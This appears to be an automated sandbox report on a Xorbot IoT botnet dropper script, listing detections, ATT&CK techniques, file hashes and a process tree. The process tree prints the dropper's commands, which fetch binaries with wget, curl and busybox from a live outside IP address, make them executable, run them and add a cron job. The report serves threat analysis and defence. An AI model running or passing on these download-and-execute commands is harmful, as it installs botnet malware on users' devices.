xorbot | 3ebb1d478cfff5b5e325d281957e1364851ce10d174cd95e76c37e74b028f789

Analysis

max time kernel
150s
max time network
153s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
03/12/2024, 06:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

7e4709c72b7042c5a051d82d8765d229
SHA1

a0d5c07a09e781a20f3443dedae239ed96ba33c1
SHA256

3ebb1d478cfff5b5e325d281957e1364851ce10d174cd95e76c37e74b028f789
SHA512

736c107818007aed1eb7bcdb1674fa723eef0d6b54a53a8e7cc1a13df7d2e64a77721604c70dec862125da1b413400ff0d05f8c0446da76b80307a7900566cb6
SSDEEP

192:Hr88u6+p1FJ7fnAgNXBLwzxRbDbEsu6+p1F/7fnAgd0xRFt:L8p9XBLwzxRbDgZX0xRFt

Score

10^/10

xorbot antivm botnet defense_evasion discovery execution persistence privilege_escalatio trojan

Malware Config

Signatures

Detects Xorbot 3 IoCs

botnet trojan

resource	yara_rule
behavioral2/files/fstream-1.dat	family_xorbot
behavioral2/files/fstream-3.dat	family_xorbot
behavioral2/files/fstream-8.dat	family_xorbot

Xorbot
Xorbot is a linux botnet and trojan targeting IoT devices.
botnet trojan xorbot
Xorbot family
xorbot
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Contacts a large (1944) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 3 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
700	chmod
712	chmod
823	chmod

Executes dropped EXE 3 IoCs

ioc	pid	Process
/tmp/59gh7cCNwSRpx1ci3HT9jivbMxlJObIBDQ	701	59gh7cCNwSRpx1ci3HT9jivbMxlJObIBDQ
/tmp/BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m	714	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
/tmp/H3fShSr07bZqjoHOcSc5sI9pSM4PaPBgVF	824	H3fShSr07bZqjoHOcSc5sI9pSM4PaPBgVF

Renames itself 1 IoCs

pid	Process
715	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalatio

Cron

T1053.003

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.zLeXlz	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Checks CPU configuration 1 TTPs 2 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/760/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/776/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/1105/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/887/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/979/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/1076/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/1129/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/1137/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/21/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/41/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/1044/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/1112/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/1020/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/13/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/801/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/841/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/854/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/1010/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/1116/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/969/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/1103/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/26/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/864/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/884/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/889/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/1006/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/1090/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/1144/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/745/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/828/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/758/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/1086/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/805/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/948/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/987/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/1113/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/1018/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/1025/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/1094/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/1072/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/795/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/1004/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/1022/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/800/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/898/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/936/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/3/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/148/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/751/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/953/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/998/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/2/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/677/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/937/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/282/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/921/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/806/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/1030/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/1142/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/771/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/888/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/1104/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
File opened for reading	/proc/407/cmdline	BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m

Writes file to tmp directory 7 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m	curl
File opened for modification	/tmp/BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m	busybox
File opened for modification	/tmp/H3fShSr07bZqjoHOcSc5sI9pSM4PaPBgVF	busybox
File opened for modification	/tmp/59gh7cCNwSRpx1ci3HT9jivbMxlJObIBDQ	wget
File opened for modification	/tmp/59gh7cCNwSRpx1ci3HT9jivbMxlJObIBDQ	curl
File opened for modification	/tmp/59gh7cCNwSRpx1ci3HT9jivbMxlJObIBDQ	busybox
File opened for modification	/tmp/BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m	wget

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:666
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:669
- /usr/bin/wget
  wget http://216.126.231.240/bins/59gh7cCNwSRpx1ci3HT9jivbMxlJObIBDQ
  2⤵
  - Writes file to tmp directory
  PID:673
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/59gh7cCNwSRpx1ci3HT9jivbMxlJObIBDQ
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:691
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/59gh7cCNwSRpx1ci3HT9jivbMxlJObIBDQ
  2⤵
  - Writes file to tmp directory
  PID:698
- /bin/chmod
  chmod 777 59gh7cCNwSRpx1ci3HT9jivbMxlJObIBDQ
  2⤵
  - File and Directory Permissions Modification
  PID:700
- /tmp/59gh7cCNwSRpx1ci3HT9jivbMxlJObIBDQ
  ./59gh7cCNwSRpx1ci3HT9jivbMxlJObIBDQ
  2⤵
  - Executes dropped EXE
  PID:701
- /bin/rm
  rm 59gh7cCNwSRpx1ci3HT9jivbMxlJObIBDQ
  2⤵
  PID:703
- /usr/bin/wget
  wget http://216.126.231.240/bins/BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
  2⤵
  - Writes file to tmp directory
  PID:704
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:705
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
  2⤵
  - Writes file to tmp directory
  PID:709
- /bin/chmod
  chmod 777 BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
  2⤵
  - File and Directory Permissions Modification
  PID:712
- /tmp/BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
  ./BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
  2⤵
  - Executes dropped EXE
  - Renames itself
  - Reads runtime system information
  PID:714
- - /bin/sh
    sh -c "crontab -l"
    3⤵
    PID:716
  - - /usr/bin/crontab
      crontab -l
      4⤵
      PID:717
- - /bin/sh
    sh -c "crontab -"
    3⤵
    PID:719
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      PID:720
- /bin/rm
  rm BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m
  2⤵
  PID:724
- /usr/bin/wget
  wget http://216.126.231.240/bins/H3fShSr07bZqjoHOcSc5sI9pSM4PaPBgVF
  2⤵
  PID:727
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/H3fShSr07bZqjoHOcSc5sI9pSM4PaPBgVF
  2⤵
  PID:729
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/H3fShSr07bZqjoHOcSc5sI9pSM4PaPBgVF
  2⤵
  - Writes file to tmp directory
  PID:815
- /bin/chmod
  chmod 777 H3fShSr07bZqjoHOcSc5sI9pSM4PaPBgVF
  2⤵
  - File and Directory Permissions Modification
  PID:823
- /tmp/H3fShSr07bZqjoHOcSc5sI9pSM4PaPBgVF
  ./H3fShSr07bZqjoHOcSc5sI9pSM4PaPBgVF
  2⤵
  - Executes dropped EXE
  PID:824
- /bin/rm
  rm H3fShSr07bZqjoHOcSc5sI9pSM4PaPBgVF
  2⤵
  PID:825
- /usr/bin/wget
  wget http://216.126.231.240/bins/iRQBn7OXXPuKlsEvikM51RP4nztFY0QGWb
  2⤵
  PID:826
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/iRQBn7OXXPuKlsEvikM51RP4nztFY0QGWb
  2⤵
  PID:829

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

Network Service Discovery

T1046

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/59gh7cCNwSRpx1ci3HT9jivbMxlJObIBDQ

Filesize
99KB

MD5
9438d9bc392bcf300a5583b6df5bc8f6

SHA1
375a6ae34b516f6f3eeea8030c4084f585017efa

SHA256
68e6282ed9046c9e22dbdf051dc03956803a46805f599e8cb9b52b993caa8f1e

SHA512
1f3e4219359a28c0f6373c0369da2b5dc0e89789afb89664627d8d9e37d4b72da36322b4015491d7daa03e46dff07d39f00dca18f274e9623dab0ff2d869c860

Download Submit
/tmp/BuoL6QtEinR9UGphsyGv4AVUmNVaYf5i3m

Filesize
141KB

MD5
3ca8decdb1e52c423c521bfff02ac200

SHA1
8621ecd6807109b8541912ad9e134f6fb49bfd48

SHA256
dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f

SHA512
b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a

Download Submit
/tmp/H3fShSr07bZqjoHOcSc5sI9pSM4PaPBgVF

Filesize
111KB

MD5
701e7a55a4f3650f5feee92a9860e5fc

SHA1
6ce4a7f0dc80fe557a0ace4de25e6305af221ed4

SHA256
ff851250b0bd7e6f2c445b08d858d840b554caf75a37ada2a970ea4d317ba588

SHA512
7352517b4af3b0cfe1cc814accf18e6254532f33dee274279bd499b6748aa0ed044c9429d6df0eb07ff0292cd0f9388ce44d278e0c562e6e57110b28a66a5f11

Download Submit
/var/spool/cron/crontabs/tmp.zLeXlz

Filesize
210B

MD5
097b2d52bcf489e4b8726005e3123d99

SHA1
f2136feb8cfbd1210b1c0f2e3334002e1547ff79

SHA256
0a7fbf3a441dd8ee3c524b446b415bdd10c33a28f9cc48693bc7298752d79c7a

SHA512
d1288189fc9e2fa2261f64f4b3ebb1274ebc67521efc657263779c36160fa95288cdaae19f9823a3b48b30e8a95b70589556c8ba06ded17b3b84b8d0f21733d4

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads